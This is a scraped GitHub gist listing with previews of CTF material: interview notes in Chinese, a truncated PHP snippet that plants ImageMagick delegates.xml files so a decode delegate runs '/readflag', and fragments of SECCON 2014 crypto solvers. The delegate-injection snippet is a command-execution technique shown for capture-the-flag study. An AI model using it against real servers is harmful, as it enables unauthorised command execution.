Skip to content

Instantly share code, notes, and snippets.

View Southseast's full-sized avatar
🐱
Neko

南溟NaN Southseast

🐱
Neko
View GitHub Profile
@kaiili
kaiili / 2020-春招提前批
Last active November 6, 2020 15:43
群友想看。。。
有三个面试机会。
奇安信,陌陌安全,腾讯。
奇安信:
大概是按照渗透的流程开始问的。
<?php
$home = '/tmp/84d99af2ce44bb1dd3398190b930c8ac';
ini_set('display_errors', 1);
mkdir("$home/.magick/");
file_put_contents("$home/.magick/delegates.xml", "<delegatemap><delegate decode=\"foo\" command=\"/readflag > $home/flag\"/></delegatemap>");
mkdir("$home/.config/");
mkdir("$home/.config/ImageMagick");
file_put_contents("$home/.config/ImageMagick/delegates.xml", "<delegatemap><delegate decode=\"foo\" command=\"/readflag > $home/flag\"/></delegatemap>");
touch("$home/test.foo");
$_ENV['HOME'] = $home;
@volpino
volpino / solver.py
Created December 7, 2014 09:58
SECCON 2014 - crypto200
def mul_inv(a, b):
b0 = b
x0, x1 = 0, 1
if b == 1: return 1
while a > 1:
q = a / b
a, b = b, a%b
x0, x1 = x1 - q * x0, x0
if x1 < 0: x1 += b0
return x1
@volpino
volpino / solve.c
Created December 7, 2014 09:45
SECCON 2014 - crypto200
#include <stdio.h>
int main(int argc, char** argv)
{
signed int result;
unsigned int seed;
FILE *input_file;
FILE *output_file;
char buf;